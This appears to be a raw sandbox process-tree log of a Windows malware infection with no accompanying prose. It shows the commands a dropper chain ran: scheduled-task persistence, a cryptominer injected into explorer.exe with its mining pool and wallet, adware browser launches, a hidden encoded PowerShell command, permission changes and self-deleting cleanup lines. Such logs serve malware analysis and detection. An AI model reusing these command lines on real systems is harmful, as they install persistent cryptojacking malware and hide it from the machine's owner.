C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:3308
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:3424
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:4068
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:4476
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:4388
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:4812
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:6052
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵PID:2484
-
C:\ProgramData\3509134.exe"C:\ProgramData\3509134.exe"8⤵PID:3284
-
-
C:\ProgramData\4801079.exe"C:\ProgramData\4801079.exe"8⤵PID:3688
-
-
C:\ProgramData\6739550.exe"C:\ProgramData\6739550.exe"8⤵PID:3868
-
C:\ProgramData\6739550.exe"C:\ProgramData\6739550.exe"9⤵PID:1596
-
-
C:\ProgramData\6739550.exe"C:\ProgramData\6739550.exe"9⤵PID:1748
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 7729⤵
- Program crash
PID:3312
-
-
-
C:\ProgramData\5463835.exe"C:\ProgramData\5463835.exe"8⤵PID:4084
-
-
C:\ProgramData\8434149.exe"C:\ProgramData\8434149.exe"8⤵PID:3520
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵PID:2520
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2520 -s 14368⤵
- Program crash
PID:3532
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:2616
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{JGjy-2e3WZ-tomB-BRANx}\12468804993.exe"8⤵PID:2052
-
C:\Users\Admin\AppData\Local\Temp\{JGjy-2e3WZ-tomB-BRANx}\12468804993.exe"C:\Users\Admin\AppData\Local\Temp\{JGjy-2e3WZ-tomB-BRANx}\12468804993.exe"9⤵PID:2108
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{JGjy-2e3WZ-tomB-BRANx}\88614255155.exe" /mix8⤵PID:2892
-
C:\Users\Admin\AppData\Local\Temp\{JGjy-2e3WZ-tomB-BRANx}\88614255155.exe"C:\Users\Admin\AppData\Local\Temp\{JGjy-2e3WZ-tomB-BRANx}\88614255155.exe" /mix9⤵PID:6160
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\gFuvMRqB & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{JGjy-2e3WZ-tomB-BRANx}\88614255155.exe"10⤵PID:3336
-
C:\Windows\SysWOW64\timeout.exetimeout 411⤵
- Delays execution with timeout.exe
PID:6476
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{JGjy-2e3WZ-tomB-BRANx}\41600461907.exe" /mix8⤵PID:2840
-
C:\Users\Admin\AppData\Local\Temp\{JGjy-2e3WZ-tomB-BRANx}\41600461907.exe"C:\Users\Admin\AppData\Local\Temp\{JGjy-2e3WZ-tomB-BRANx}\41600461907.exe" /mix9⤵PID:2980
-
C:\Users\Admin\AppData\Roaming\sliders\apinesp.exeapinesp.exe10⤵PID:3328
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:3084
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
PID:3296
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵PID:2756
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵PID:2832
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2832 -s 14408⤵
- Program crash
PID:3544
-
-
-
C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"7⤵PID:2960
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵PID:3052
-
C:\Users\Admin\AppData\Local\Temp\is-S6AK7.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-S6AK7.tmp\setup_2.tmp" /SL5="$103D4,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵PID:1040
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵PID:4344
-
C:\Users\Admin\AppData\Local\Temp\is-O6UM7.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-O6UM7.tmp\setup_2.tmp" /SL5="$1044A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵PID:4928
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵PID:2092
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵PID:2260
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵PID:1408
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe4⤵PID:1392
-
C:\Users\Admin\AppData\Local\Temp\7zSCE6A11F2\Sun19eb40faaaa9.exeSun19eb40faaaa9.exe5⤵PID:5348
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 6686⤵
- Program crash
PID:7088
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun198361825f4.exe4⤵
- Loads dropped DLL
PID:2040 -
C:\Users\Admin\AppData\Local\Temp\7zSCE6A11F2\Sun198361825f4.exeSun198361825f4.exe5⤵
- Executes dropped EXE
PID:740
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe4⤵
- Loads dropped DLL
PID:1684 -
C:\Users\Admin\AppData\Local\Temp\7zSCE6A11F2\Sun1905815e51282417.exeSun1905815e51282417.exe5⤵
- Executes dropped EXE
PID:1640
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe4⤵
- Loads dropped DLL
PID:996 -
C:\Users\Admin\AppData\Local\Temp\7zSCE6A11F2\Sun195a1614ec24e6a.exeSun195a1614ec24e6a.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe4⤵
- Loads dropped DLL
PID:1668 -
C:\Users\Admin\AppData\Local\Temp\7zSCE6A11F2\Sun1966fb31dd5a07.exeSun1966fb31dd5a07.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:472 -
C:\Users\Admin\AppData\Local\Temp\is-CG9QI.tmp\Sun1966fb31dd5a07.tmp"C:\Users\Admin\AppData\Local\Temp\is-CG9QI.tmp\Sun1966fb31dd5a07.tmp" /SL5="$7001C,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zSCE6A11F2\Sun1966fb31dd5a07.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:992 -
C:\Users\Admin\AppData\Local\Temp\is-AVS2F.tmp\Ze2ro.exe"C:\Users\Admin\AppData\Local\Temp\is-AVS2F.tmp\Ze2ro.exe" /S /UID=burnerch27⤵PID:1576
-
C:\Program Files\Uninstall Information\PJWKPOUEAU\ultramediaburner.exe"C:\Program Files\Uninstall Information\PJWKPOUEAU\ultramediaburner.exe" /VERYSILENT8⤵PID:3580
-
C:\Users\Admin\AppData\Local\Temp\is-DFUNF.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-DFUNF.tmp\ultramediaburner.tmp" /SL5="$10304,281924,62464,C:\Program Files\Uninstall Information\PJWKPOUEAU\ultramediaburner.exe" /VERYSILENT9⤵PID:3664
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:3796
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\e9-9edc6-8a3-582ac-8d6a92c089b6e\Lizhetafizhi.exe"C:\Users\Admin\AppData\Local\Temp\e9-9edc6-8a3-582ac-8d6a92c089b6e\Lizhetafizhi.exe"8⤵PID:3708
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵PID:3964
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3964 CREDAT:275457 /prefetch:210⤵PID:3128
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3964 CREDAT:472069 /prefetch:210⤵PID:4568
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3964 CREDAT:209938 /prefetch:210⤵PID:1848
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3964 CREDAT:4142096 /prefetch:210⤵PID:6024
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵PID:3348
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3348 CREDAT:275457 /prefetch:210⤵PID:6840
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18514839⤵PID:364
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:364 CREDAT:275457 /prefetch:210⤵PID:6456
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18515139⤵PID:2264
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2264 CREDAT:275457 /prefetch:210⤵PID:3320
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=20872159⤵PID:1876
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=42631199⤵PID:4840
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4840 CREDAT:275457 /prefetch:210⤵PID:5564
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?id=12942319⤵PID:4628
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4628 CREDAT:275457 /prefetch:210⤵PID:5964
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7b-170ed-018-da3b1-12299f6bfec79\Dejibicyku.exe"C:\Users\Admin\AppData\Local\Temp\7b-170ed-018-da3b1-12299f6bfec79\Dejibicyku.exe"8⤵PID:3752
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ndkpgsgj.stc\GcleanerEU.exe /eufive & exit9⤵PID:2772
-
C:\Users\Admin\AppData\Local\Temp\ndkpgsgj.stc\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\ndkpgsgj.stc\GcleanerEU.exe /eufive10⤵PID:2424
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{0nnn-gi1O0-tuRB-OvRAH}\16122695880.exe"11⤵PID:1928
-
C:\Users\Admin\AppData\Local\Temp\{0nnn-gi1O0-tuRB-OvRAH}\16122695880.exe"C:\Users\Admin\AppData\Local\Temp\{0nnn-gi1O0-tuRB-OvRAH}\16122695880.exe"12⤵PID:1752
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 89213⤵
- Program crash
PID:4324
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{0nnn-gi1O0-tuRB-OvRAH}\74479409554.exe" /eu11⤵PID:6776
-
C:\Users\Admin\AppData\Local\Temp\{0nnn-gi1O0-tuRB-OvRAH}\74479409554.exe"C:\Users\Admin\AppData\Local\Temp\{0nnn-gi1O0-tuRB-OvRAH}\74479409554.exe" /eu12⤵PID:6880
-
C:\Users\Admin\AppData\Roaming\sliders\lipstersh.exelipstersh.exe13⤵PID:756
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{0nnn-gi1O0-tuRB-OvRAH}\71560760594.exe" /eu11⤵PID:5268
-
C:\Users\Admin\AppData\Local\Temp\{0nnn-gi1O0-tuRB-OvRAH}\71560760594.exe"C:\Users\Admin\AppData\Local\Temp\{0nnn-gi1O0-tuRB-OvRAH}\71560760594.exe" /eu12⤵PID:6808
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\LIAwsoPwfdPr & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{0nnn-gi1O0-tuRB-OvRAH}\71560760594.exe"13⤵PID:5200
-
C:\Windows\SysWOW64\timeout.exetimeout 414⤵
- Delays execution with timeout.exe
PID:5824
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"11⤵PID:560
-
C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"12⤵PID:5272
-
C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"13⤵PID:2380
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ndkpgsgj.stc\GcleanerEU.exe" & exit11⤵PID:6532
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f12⤵
- Kills process with taskkill
PID:4896
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uqhf5iae.2f4\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:2432
-
C:\Users\Admin\AppData\Local\Temp\uqhf5iae.2f4\installer.exeC:\Users\Admin\AppData\Local\Temp\uqhf5iae.2f4\installer.exe /qn CAMPAIGN="654"10⤵PID:5860
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\uqhf5iae.2f4\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\uqhf5iae.2f4\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632287976 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵PID:2180
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fe5jg1tz.tgp\anyname.exe & exit9⤵PID:2376
-
C:\Users\Admin\AppData\Local\Temp\fe5jg1tz.tgp\anyname.exeC:\Users\Admin\AppData\Local\Temp\fe5jg1tz.tgp\anyname.exe10⤵PID:5396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ol1v2wji.ojw\gcleaner.exe /mixfive & exit9⤵PID:4940
-
C:\Users\Admin\AppData\Local\Temp\ol1v2wji.ojw\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ol1v2wji.ojw\gcleaner.exe /mixfive10⤵PID:4000
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{oj5K-VV8Qy-S3bZ-fMgJt}\67404161539.exe"11⤵PID:7060
-
C:\Users\Admin\AppData\Local\Temp\{oj5K-VV8Qy-S3bZ-fMgJt}\67404161539.exe"C:\Users\Admin\AppData\Local\Temp\{oj5K-VV8Qy-S3bZ-fMgJt}\67404161539.exe"12⤵PID:1808
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{oj5K-VV8Qy-S3bZ-fMgJt}\17851653335.exe" /mix11⤵PID:2920
-
C:\Users\Admin\AppData\Local\Temp\{oj5K-VV8Qy-S3bZ-fMgJt}\17851653335.exe"C:\Users\Admin\AppData\Local\Temp\{oj5K-VV8Qy-S3bZ-fMgJt}\17851653335.exe" /mix12⤵PID:6668
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\MlRptIRQ & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{oj5K-VV8Qy-S3bZ-fMgJt}\17851653335.exe"13⤵PID:5600
-
C:\Windows\SysWOW64\timeout.exetimeout 414⤵
- Delays execution with timeout.exe
PID:816
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{oj5K-VV8Qy-S3bZ-fMgJt}\38947891744.exe" /mix11⤵PID:6756
-
C:\Users\Admin\AppData\Local\Temp\{oj5K-VV8Qy-S3bZ-fMgJt}\38947891744.exe"C:\Users\Admin\AppData\Local\Temp\{oj5K-VV8Qy-S3bZ-fMgJt}\38947891744.exe" /mix12⤵PID:1968
-
C:\Users\Admin\AppData\Roaming\sliders\apinesp.exeapinesp.exe13⤵PID:4328
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"11⤵PID:6452
-
C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"12⤵PID:5800
-
C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"13⤵PID:3416
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ol1v2wji.ojw\gcleaner.exe" & exit11⤵PID:5064
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f12⤵
- Kills process with taskkill
PID:2340
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v4r3kqmr.ua3\autosubplayer.exe /S & exit9⤵PID:1544
-
C:\Users\Admin\AppData\Local\Temp\v4r3kqmr.ua3\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\v4r3kqmr.ua3\autosubplayer.exe /S10⤵PID:2460
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst4C8B.tmp\tempfile.ps1"11⤵PID:456
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst4C8B.tmp\tempfile.ps1"11⤵PID:6292
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst4C8B.tmp\tempfile.ps1"11⤵PID:6744
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\890C.exeC:\Users\Admin\AppData\Local\Temp\890C.exe1⤵PID:1952
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1820 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:1156
-
-
C:\Users\Admin\AppData\Local\Temp\77F.exeC:\Users\Admin\AppData\Local\Temp\77F.exe1⤵PID:2308
-
C:\Users\Admin\AppData\Local\Temp\77F.exeC:\Users\Admin\AppData\Local\Temp\77F.exe2⤵PID:4624
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\3f199502-c8bb-4b0f-8f8d-4083e50d75c9" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:1708
-
-
C:\Users\Admin\AppData\Local\Temp\77F.exe"C:\Users\Admin\AppData\Local\Temp\77F.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:2080
-
C:\Users\Admin\AppData\Local\Temp\77F.exe"C:\Users\Admin\AppData\Local\Temp\77F.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:5424
-
C:\Users\Admin\AppData\Local\2064e265-af04-4309-bf5e-3a8eba81ad3c\build2.exe"C:\Users\Admin\AppData\Local\2064e265-af04-4309-bf5e-3a8eba81ad3c\build2.exe"5⤵PID:5336
-
C:\Users\Admin\AppData\Local\2064e265-af04-4309-bf5e-3a8eba81ad3c\build2.exe"C:\Users\Admin\AppData\Local\2064e265-af04-4309-bf5e-3a8eba81ad3c\build2.exe"6⤵PID:4556
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 8127⤵
- Program crash
PID:2684
-
-
-
-
-
-
-
C:\Users\Admin\Documents\VubQda3WD0amGU8CgYV8AxQi.exeC:\Users\Admin\Documents\VubQda3WD0amGU8CgYV8AxQi.exe1⤵PID:4896
-
C:\Users\Admin\AppData\Local\Temp\5EE3.exeC:\Users\Admin\AppData\Local\Temp\5EE3.exe1⤵PID:5248
-
C:\Users\Admin\AppData\Local\Temp\71D8.exeC:\Users\Admin\AppData\Local\Temp\71D8.exe1⤵PID:5592
-
C:\Users\Admin\AppData\Local\Temp\FBC0.exeC:\Users\Admin\AppData\Local\Temp\FBC0.exe1⤵PID:2156
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im FBC0.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\FBC0.exe" & del C:\ProgramData\*.dll & exit2⤵PID:2456
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im FBC0.exe /f3⤵
- Kills process with taskkill
PID:5268
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:7036
-
-
-
C:\Users\Admin\AppData\Local\Temp\56DB.exeC:\Users\Admin\AppData\Local\Temp\56DB.exe1⤵PID:5496
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6088
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4208
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3020
-
C:\Windows\system32\taskeng.exetaskeng.exe {FBE3EC2B-AC96-41CD-92A1-3608C4783B4F} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:4752
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵PID:5404
-
-
C:\Users\Admin\AppData\Roaming\bfabswaC:\Users\Admin\AppData\Roaming\bfabswa2⤵PID:6112
-
-
C:\Users\Admin\AppData\Roaming\cuabswaC:\Users\Admin\AppData\Roaming\cuabswa2⤵PID:188
-
-
C:\Program Files\Mozilla Firefox\default-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task2⤵PID:6984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵PID:1744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵PID:2736
-
-
C:\Users\Admin\AppData\Local\3f199502-c8bb-4b0f-8f8d-4083e50d75c9\77F.exeC:\Users\Admin\AppData\Local\3f199502-c8bb-4b0f-8f8d-4083e50d75c9\77F.exe --Task2⤵PID:2152
-
C:\Users\Admin\AppData\Local\3f199502-c8bb-4b0f-8f8d-4083e50d75c9\77F.exeC:\Users\Admin\AppData\Local\3f199502-c8bb-4b0f-8f8d-4083e50d75c9\77F.exe --Task3⤵PID:4284
-
-
-
C:\Users\Admin\AppData\Roaming\cuabswaC:\Users\Admin\AppData\Roaming\cuabswa2⤵PID:4548
-
-
C:\Users\Admin\AppData\Roaming\bfabswaC:\Users\Admin\AppData\Roaming\bfabswa2⤵PID:4360
-
-
C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\HmOQMgkV\HOUTIvj.exeC:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\HmOQMgkV\HOUTIvj.exe JB /S2⤵PID:1944
-
-
C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\UYpqdsVz\qMMMIhS.exeC:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\UYpqdsVz\qMMMIhS.exe JB /S2⤵PID:6516
-
-
